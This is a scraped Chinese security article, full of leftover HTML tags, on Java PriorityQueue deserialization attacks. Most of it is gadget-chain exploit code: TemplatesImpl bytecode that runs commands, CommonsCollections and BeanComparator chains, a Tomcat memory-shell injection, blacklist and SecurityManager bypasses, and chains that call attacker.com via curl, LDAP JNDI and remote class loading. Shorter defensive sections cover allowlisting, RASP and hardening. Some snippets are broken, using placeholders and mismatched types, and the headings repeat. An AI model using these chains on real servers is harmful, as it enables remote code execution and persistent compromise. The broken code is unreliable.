Java PriorityQueue反序列化漏洞深度分析与防御指南<\/h1>

一、PriorityQueue反序列化漏洞核心原理<\/h2>
PriorityQueue在反序列化时会触发`heapify()<\/code>方法重建堆结构，通过siftDown()<\/code>方法调用Comparator.compare()<\/code>或元素的compareTo()<\/code>方法。这是构造反序列化攻击链的关键切入点。<\/p>`

1. 基础攻击链构造（结合TemplatesImpl）<\/h3>
\/\/ 生成恶意字节码
<\/span><\/span><\/span><\/span>public<\/span> static<\/span> class<\/span> EvilClass<\/span> {<\/span>
<\/span><\/span>    static<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc.exe"<\/span>);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {}<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>byte<\/span>[]<\/span> evilCode =<\/span> ClassPool.<\/span>getDefault<\/span>().<\/span>makeClass<\/span>(<\/span>EvilClass.<\/span>class<\/span>).<\/span>toBytecode<\/span>();<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造TemplatesImpl对象
<\/span><\/span><\/span><\/span>TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>setField(<\/span>templates,<\/span> "_name"<\/span>,<\/span> "Exploit"<\/span>);<\/span>
<\/span><\/span>setField(<\/span>templates,<\/span> "_bytecodes"<\/span>,<\/span> new<\/span> byte<\/span>[][]{<\/span>evilCode});<\/span>
<\/span><\/span>setField(<\/span>templates,<\/span> "_tfactory"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造比较器链
<\/span><\/span><\/span><\/span>Comparator comparator =<\/span> new<\/span> Comparator()<\/span> {<\/span>
<\/span><\/span>    public<\/span> int<\/span> compare<\/span>(<\/span>Object o1,<\/span> Object o2)<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            templates.<\/span>newTransformer<\/span>();<\/span> \/\/ 触发静态代码块
<\/span><\/span><\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {}<\/span>
<\/span><\/span>        return<\/span> 0<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造恶意PriorityQueue
<\/span><\/span><\/span><\/span>PriorityQueue<<\/span>Object><\/span> queue =<\/span> new<\/span> PriorityQueue<>(<\/span>2<\/span>,<\/span> comparator);<\/span>
<\/span><\/span>queue.<\/span>add<\/span>(<\/span>1<\/span>);<\/span>
<\/span><\/span>queue.<\/span>add<\/span>(<\/span>1<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化payload
<\/span><\/span><\/span><\/span>ByteArrayOutputStream bos =<\/span> new<\/span> ByteArrayOutputStream();<\/span>
<\/span><\/span>new<\/span> ObjectOutputStream(<\/span>bos).<\/span>writeObject<\/span>(<\/span>queue);<\/span>
<\/span><\/span>byte<\/span>[]<\/span> payload =<\/span> bos.<\/span>toByteArray<\/span>();<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 反序列化触发
<\/span><\/span><\/span><\/span>new<\/span> ObjectInputStream(<\/span>new<\/span> ByteArrayInputStream(<\/span>payload)).<\/span>readObject<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>二、绕过技巧<\/h2>
1. 结合BeanComparator（commons-beanutils）<\/h3>
\/\/ 构造属性比较链
<\/span><\/span><\/span><\/span>BeanComparator comparator =<\/span> new<\/span> BeanComparator(<\/span>"outputProperties"<\/span>);<\/span>
<\/span><\/span>PriorityQueue<<\/span>Object><\/span> queue =<\/span> new<\/span> PriorityQueue<>(<\/span>2<\/span>,<\/span> comparator);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 设置触发对象
<\/span><\/span><\/span><\/span>queue.<\/span>add<\/span>(<\/span>templates);<\/span>
<\/span><\/span>queue.<\/span>add<\/span>(<\/span>templates);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化后触发流程:
<\/span><\/span><\/span>\/\/ 1. PriorityQueue反序列化触发排序
<\/span><\/span><\/span>\/\/ 2. BeanComparator调用getOutputProperties()
<\/span><\/span><\/span>\/\/ 3. 触发TemplatesImpl.newTransformer()
<\/span><\/span><\/span><\/code><\/pre>2. JDK高版本绕过（jdk >= 8u71）<\/h3>
\/\/ 使用ToStringComparator（commons-collections4）
<\/span><\/span><\/span><\/span>Comparator comparator =<\/span> new<\/span> TransformedComparator(<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"toString"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>),<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>1<\/span>));<\/span>
<\/span><\/span>PriorityQueue<<\/span>Object><\/span> queue =<\/span> new<\/span> PriorityQueue<>(<\/span>2<\/span>,<\/span> comparator);<\/span>
<\/span><\/span>queue.<\/span>add<\/span>(<\/span>templates);<\/span> \/\/ 对象需实现Comparable
<\/span><\/span><\/span><\/span>queue.<\/span>add<\/span>(<\/span>templates);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 触发流程:
<\/span><\/span><\/span>\/\/ compare() → toString() → getOutputProperties()
<\/span><\/span><\/span><\/code><\/pre>三、内存马注入技巧<\/h2>
1. Tomcat Filter型内存马<\/h3>
\/\/ 构造恶意Filter注入链
<\/span><\/span><\/span><\/span>Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Thread.<\/span>currentThread<\/span>().<\/span>getContextClassLoader<\/span>()),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"loadClass"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"org.apache.catalina.core.ApplicationFilterConfig"<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"getFilter"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> new<\/span> Object[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"setFilter"<\/span>,<\/span> new<\/span> Class[]{<\/span>Filter.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>new<\/span> EvilFilter()})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>ChainedTransformer chain =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>PriorityQueue<<\/span>Object><\/span> queue =<\/span> new<\/span> PriorityQueue<>(<\/span>2<\/span>,<\/span> new<\/span> TransformingComparator(<\/span>chain));<\/span>
<\/span><\/span><\/code><\/pre>四、防御对抗技术<\/h2>
1. 黑名单检测绕过<\/h3>
\/\/ 使用非标准Transformer组合
<\/span><\/span><\/span><\/span>Comparator comparator =<\/span> new<\/span> ComparatorChain(<\/span>Arrays.<\/span>asList<\/span>(<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Class.<\/span>forName<\/span>(<\/span>"java.lang.Runtime"<\/span>)),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> new<\/span> Object[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"calc.exe"<\/span>})<\/span>
<\/span><\/span>));<\/span>
<\/span><\/span><\/code><\/pre>2. 反射绕过SecurityManager<\/h3>
\/\/ 通过Unsafe修改访问权限
<\/span><\/span><\/span><\/span>Field theUnsafe =<\/span> Unsafe.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"theUnsafe"<\/span>);<\/span>
<\/span><\/span>theUnsafe.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>Unsafe unsafe =<\/span> (<\/span>Unsafe)<\/span> theUnsafe.<\/span>get<\/span>(<\/span>null<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 强制修改Comparator字段
<\/span><\/span><\/span><\/span>Field comparatorField =<\/span> PriorityQueue.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"comparator"<\/span>);<\/span>
<\/span><\/span>long<\/span> offset =<\/span> unsafe.<\/span>objectFieldOffset<\/span>(<\/span>comparatorField);<\/span>
<\/span><\/span>unsafe.<\/span>putObject<\/span>(<\/span>queue,<\/span> offset,<\/span> maliciousComparator);<\/span>
<\/span><\/span><\/code><\/pre>五、检测与防御方案<\/h2>
1. 安全反序列化实现<\/h3>
public<\/span> class<\/span> SafeObjectInputStream<\/span> extends<\/span> ObjectInputStream {<\/span>
<\/span><\/span>    private<\/span> static<\/span> final<\/span> Set<<\/span>String><\/span> ALLOWED_CLASSES =<\/span> Set.<\/span>of<\/span>(<\/span>"java.util.PriorityQueue"<\/span>,<\/span> "java.lang.Integer"<\/span>);<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    protected<\/span> Class<?><\/span> resolveClass(<\/span>ObjectStreamClass desc)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>        if<\/span> (!<\/span>ALLOWED_CLASSES.<\/span>contains<\/span>(<\/span>desc.<\/span>getName<\/span>()))<\/span> {<\/span>
<\/span><\/span>            throw<\/span> new<\/span> InvalidClassException(<\/span>"Unauthorized class: "<\/span>,<\/span> desc.<\/span>getName<\/span>());<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        return<\/span> super<\/span>.<\/span>resolveClass<\/span>(<\/span>desc);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 使用方式
<\/span><\/span><\/span><\/span>try<\/span> (<\/span>ObjectInputStream ois =<\/span> new<\/span> SafeObjectInputStream(<\/span>inputStream))<\/span> {<\/span>
<\/span><\/span>    ois.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2. 运行时检测（RASP）<\/h3>
\/\/ 使用Java Agent检测PriorityQueue反序列化
<\/span><\/span><\/span><\/span>public<\/span> class<\/span> PriorityQueueAgent<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> premain<\/span>(<\/span>String args,<\/span> Instrumentation inst)<\/span> {<\/span>
<\/span><\/span>        inst.<\/span>addTransformer<\/span>((<\/span>loader,<\/span> className,<\/span> classBeingRedefined,<\/span> protectionDomain,<\/span> classfileBuffer)<\/span> -><\/span> {<\/span>
<\/span><\/span>            if<\/span> (<\/span>"java\/util\/PriorityQueue"<\/span>.<\/span>equals<\/span>(<\/span>className))<\/span> {<\/span>
<\/span><\/span>                ClassReader cr =<\/span> new<\/span> ClassReader(<\/span>classfileBuffer);<\/span>
<\/span><\/span>                ClassWriter cw =<\/span> new<\/span> ClassWriter(<\/span>cr,<\/span> ClassWriter.<\/span>COMPUTE_FRAMES<\/span>);<\/span>
<\/span><\/span>                cr.<\/span>accept<\/span>(<\/span>new<\/span> ClassVisitor(<\/span>ASM9,<\/span> cw)<\/span> {<\/span>
<\/span><\/span>                    @Override<\/span>
<\/span><\/span>                    public<\/span> MethodVisitor visitMethod<\/span>(<\/span>int<\/span> access,<\/span> String name,<\/span> String descriptor,<\/span> String signature,<\/span> String[]<\/span> exceptions)<\/span> {<\/span>
<\/span><\/span>                        MethodVisitor mv =<\/span> super<\/span>.<\/span>visitMethod<\/span>(<\/span>access,<\/span> name,<\/span> descriptor,<\/span> signature,<\/span> exceptions);<\/span>
<\/span><\/span>                        if<\/span> (<\/span>"readObject"<\/span>.<\/span>equals<\/span>(<\/span>name))<\/span> {<\/span>
<\/span><\/span>                            return<\/span> new<\/span> MethodVisitor(<\/span>ASM9,<\/span> mv)<\/span> {<\/span>
<\/span><\/span>                                @Override<\/span>
<\/span><\/span>                                public<\/span> void<\/span> visitCode<\/span>()<\/span> {<\/span>
<\/span><\/span>                                    mv.<\/span>visitMethodInsn<\/span>(<\/span>INVOKESTATIC,<\/span> "SecurityMonitor"<\/span>,<\/span> "checkDeserialization"<\/span>,<\/span> "()V"<\/span>);<\/span>
<\/span><\/span>                                    super<\/span>.<\/span>visitCode<\/span>();<\/span>
<\/span><\/span>                                }<\/span>
<\/span><\/span>                            };<\/span>
<\/span><\/span>                        }<\/span>
<\/span><\/span>                        return<\/span> mv;<\/span>
<\/span><\/span>                    }<\/span>
<\/span><\/span>                },<\/span> 0<\/span>);<\/span>
<\/span><\/span>                return<\/span> cw.<\/span>toByteArray<\/span>();<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>            return<\/span> classfileBuffer;<\/span>
<\/span><\/span>        });<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>六、漏洞验证与利用<\/h2>
1. 使用ysoserial生成payload<\/h3>
# 生成CommonsCollections2的PriorityQueue payload<\/span>
<\/span><\/span>java -jar ysoserial.jar CommonsCollections2 "curl http:\/\/attacker.com"<\/span> > payload.bin
<\/span><\/span>
<\/span><\/span># 发送到目标服务<\/span>
<\/span><\/span>curl -X POST --data-binary @payload.bin http:\/\/vuln-app\/deserialize-endpoint
<\/span><\/span><\/code><\/pre>2. 手工构造检测<\/h3>
\/\/ 检测PriorityQueue使用情况
<\/span><\/span><\/span><\/span>Pattern.<\/span>compile<\/span>(<\/span>"new PriorityQueue\\s*\\(\\s*\\d+\\s*,\\s*.*Comparator"<\/span>)<\/span>
<\/span><\/span>    .<\/span>matcher<\/span>(<\/span>sourceCode)<\/span>
<\/span><\/span>    .<\/span>find<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>七、高级利用技巧<\/h2>
1. 基于InstantiateTransformer的类实例化攻击（CC4链变种）<\/h3>
\/\/ 构造TemplatesImpl对象（存储恶意字节码）
<\/span><\/span><\/span><\/span>TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>setField(<\/span>templates,<\/span> "_name"<\/span>,<\/span> "Exploit"<\/span>);<\/span>
<\/span><\/span>setField(<\/span>templates,<\/span> "_bytecodes"<\/span>,<\/span> new<\/span> byte<\/span>[][]{<\/span>evilCode});<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 使用InstantiateTransformer触发构造函数
<\/span><\/span><\/span><\/span>Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>TrAXFilter.<\/span>class<\/span>),<\/span> \/\/ 目标类
<\/span><\/span><\/span><\/span>    new<\/span> InstantiateTransformer(<\/span>
<\/span><\/span>        new<\/span> Class[]{<\/span>Templates.<\/span>class<\/span>},<\/span>
<\/span><\/span>        new<\/span> Object[]{<\/span>templates}<\/span> \/\/ 参数传入恶意模板
<\/span><\/span><\/span><\/span>    )<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>ChainedTransformer chain =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造PriorityQueue触发链
<\/span><\/span><\/span><\/span>PriorityQueue<<\/span>Object><\/span> queue =<\/span> new<\/span> PriorityQueue<>(<\/span>
<\/span><\/span>    2<\/span>,<\/span> new<\/span> TransformingComparator(<\/span>chain));<\/span>
<\/span><\/span>queue.<\/span>add<\/span>(<\/span>1<\/span>);<\/span>
<\/span><\/span>queue.<\/span>add<\/span>(<\/span>2<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>2. ExtractorComparator + FilterExtractor绕过黑名单（WebLogic场景）<\/h3>
\/\/ 构造JNDI注入链
<\/span><\/span><\/span><\/span>JdbcRowSetImpl jdbcRowSet =<\/span> new<\/span> JdbcRowSetImpl();<\/span>
<\/span><\/span>jdbcRowSet.<\/span>setDataSourceName<\/span>(<\/span>"ldap:\/\/attacker.com\/Exploit"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 使用FilterExtractor替代LockVersionExtractor
<\/span><\/span><\/span><\/span>MethodAttributeAccessor accessor =<\/span> new<\/span> MethodAttributeAccessor();<\/span>
<\/span><\/span>accessor.<\/span>setGetMethodName<\/span>(<\/span>"getDatabaseMetaData"<\/span>);<\/span>
<\/span><\/span>FilterExtractor extractor =<\/span> new<\/span> FilterExtractor(<\/span>accessor,<\/span> "UnicodeSec"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构建PriorityQueue触发比较器
<\/span><\/span><\/span><\/span>PriorityQueue<<\/span>Object><\/span> queue =<\/span> new<\/span> PriorityQueue<>(<\/span>
<\/span><\/span>    2<\/span>,<\/span> new<\/span> ExtractorComparator(<\/span>extractor));<\/span>
<\/span><\/span>queue.<\/span>add<\/span>(<\/span>jdbcRowSet);<\/span>
<\/span><\/span>queue.<\/span>add<\/span>(<\/span>jdbcRowSet);<\/span>
<\/span><\/span><\/code><\/pre>3. 二次反序列化技术（SignedObject封装）<\/h3>
\/\/ 构造基础PriorityQueue链
<\/span><\/span><\/span><\/span>PriorityQueue<<\/span>Object><\/span> baseQueue =<\/span> 标准恶意队列<\/span>;<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 封装到SignedObject中
<\/span><\/span><\/span><\/span>KeyPairGenerator kpg =<\/span> KeyPairGenerator.<\/span>getInstance<\/span>(<\/span>"DSA"<\/span>);<\/span>
<\/span><\/span>kpg.<\/span>initialize<\/span>(<\/span>1024<\/span>);<\/span>
<\/span><\/span>KeyPair kp =<\/span> kpg.<\/span>generateKeyPair<\/span>();<\/span>
<\/span><\/span>SignedObject signedObject =<\/span> new<\/span> SignedObject(<\/span>baseQueue,<\/span> kp.<\/span>getPrivate<\/span>(),<\/span> Signature.<\/span>getInstance<\/span>(<\/span>"DSA"<\/span>));<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 通过二次反序列化触发
<\/span><\/span><\/span><\/span>HashMap<<\/span>Object,<\/span> Object><\/span> triggerMap =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>triggerMap.<\/span>put<\/span>(<\/span>signedObject,<\/span> "value"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化后发送，触发流程:
<\/span><\/span><\/span>\/\/ 1. HashMap反序列化
<\/span><\/span><\/span>\/\/ 2. 调用SignedObject.getObject()
<\/span><\/span><\/span>\/\/ 3. 触发内部PriorityQueue的反序列化
<\/span><\/span><\/span><\/code><\/pre>4. BeanComparator + TemplatesImpl非反射链<\/h3>
\/\/ 构造TemplatesImpl对象
<\/span><\/span><\/span><\/span>TemplatesImpl templates =<\/span> 包含恶意字节码<\/span>;<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 使用BeanComparator触发getOutputProperties()
<\/span><\/span><\/span><\/span>BeanComparator comparator =<\/span> new<\/span> BeanComparator(<\/span>"outputProperties"<\/span>);<\/span>
<\/span><\/span>PriorityQueue<<\/span>Object><\/span> queue =<\/span> new<\/span> PriorityQueue<>(<\/span>2<\/span>,<\/span> comparator);<\/span>
<\/span><\/span>queue.<\/span>add<\/span>(<\/span>templates);<\/span>
<\/span><\/span>queue.<\/span>add<\/span>(<\/span>templates);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化后触发流程:
<\/span><\/span><\/span>\/\/ 1. PriorityQueue反序列化触发排序
<\/span><\/span><\/span>\/\/ 2. BeanComparator调用getOutputProperties()
<\/span><\/span><\/span>\/\/ 3. 触发TemplatesImpl.newTransformer()
<\/span><\/span><\/span><\/code><\/pre>5. ExternalizableLite接口绕过（Coherence协议）<\/h3>
\/\/ 构造恶意AttributeHolder对象
<\/span><\/span><\/span><\/span>AttributeHolder holder =<\/span> new<\/span> AttributeHolder();<\/span>
<\/span><\/span>holder.<\/span>setValue<\/span>(<\/span>evilPriorityQueue);<\/span> \/\/ 封装PriorityQueue链
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ 通过Coherence协议传输
<\/span><\/span><\/span><\/span>ExternalizableHelper.<\/span>writeObject<\/span>(<\/span>outputStream,<\/span> holder);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 触发流程:
<\/span><\/span><\/span>\/\/ 1. 反序列化AttributeHolder时调用readExternal()
<\/span><\/span><\/span>\/\/ 2. 通过ExternalizableHelper.readObject()二次反序列化PriorityQueue
<\/span><\/span><\/span><\/code><\/pre>6. 动态类加载 + URLClassLoader组合攻击<\/h3>
Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>URLClassLoader.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"newInstance"<\/span>,<\/span> new<\/span> Class[]{<\/span>URL[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>new<\/span> URL[]{<\/span>new<\/span> URL(<\/span>"http:\/\/attacker.com\/"<\/span>)}}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"loadClass"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"Exploit"<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"newInstance"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>)<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>PriorityQueue<<\/span>Object><\/span> queue =<\/span> new<\/span> PriorityQueue<>(<\/span>
<\/span><\/span>    2<\/span>,<\/span> new<\/span> TransformingComparator(<\/span>new<\/span> ChainedTransformer(<\/span>transformers)));<\/span>
<\/span><\/span><\/code><\/pre>八、防御建议<\/h2>
深度防御策略：<\/h3>

使用SerialKiller等安全反序列化库<\/li>
启用SecurityManager并配置严格策略<\/li>
定期更新Coherence、Jackson等组件的安全补丁<\/li>
<\/ul>
运行时监控：<\/h3>
\/\/ RASP检测示例
<\/span><\/span><\/span><\/span>public<\/span> class<\/span> DeserializationMonitor<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> check<\/span>(<\/span>Object obj)<\/span> {<\/span>
<\/span><\/span>        if<\/span> (<\/span>obj instanceof<\/span> PriorityQueue)<\/span> {<\/span>
<\/span><\/span>            Comparator<?><\/span> comp =<\/span> ((<\/span>PriorityQueue<?>)<\/span>obj).<\/span>comparator<\/span>();<\/span>
<\/span><\/span>            if<\/span> (<\/span>comp instanceof<\/span> TransformingComparator)<\/span> {<\/span>
<\/span><\/span>                throw<\/span> new<\/span> SecurityException(<\/span>"Blocked dangerous comparator!"<\/span>);<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>Maven依赖安全配置<\/h3>
<dependency><\/span>
<\/span><\/span>    <groupId><\/span>commons-collections<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>commons-collections<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>3.2.2<\/version><\/span> <!-- 安全版本 --><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><\/code><\/pre>JVM启动参数加固<\/h3>
-Dorg.apache.commons.collections.enableUnsafeSerialization=<\/span>false
<\/span><\/span>-Dcom.sun.org.apache.xalan.internal.xsltc.dom.XSLTCDTMManager=<\/span>com.sun.org.apache.xalan.internal.xsltc.dom.XSLTCDTMManager
<\/span><\/span><\/code><\/pre>九、关键审计点<\/h2>

ObjectInputStream.readObject()<\/code><\/li>
XMLDecoder.readObject()<\/code><\/li>
JSON.parseObject()<\/code> with @type<\/code>特性<\/li>
PriorityQueue构造器中使用自定义Comparator<\/li>
<\/ol>
Java PriorityQueue反序列化漏洞深度分析与防御指南<\/h1>

二、绕过技巧<\/h2>

三、内存马注入技巧<\/h2>

四、防御对抗技术<\/h2>

五、检测与防御方案<\/h2>

六、漏洞验证与利用<\/h2>

七、高级利用技巧<\/h2>

八、防御建议<\/h2>

九、关键审计点<\/h2> ObjectInputStream.readObject()<\/code><\/li> XMLDecoder.readObject()<\/code><\/li> JSON.parseObject()<\/code> with @type<\/code>特性<\/li> PriorityQueue构造器中使用自定义Comparator<\/li> <\/ol>

九、关键审计点<\/h2>

`ObjectInputStream.readObject()<\/code><\/li>`
`XMLDecoder.readObject()<\/code><\/li>`
`JSON.parseObject()<\/code> with @type<\/code>特性<\/li>`
`PriorityQueue构造器中使用自定义Comparator<\/li> <\/ol>`
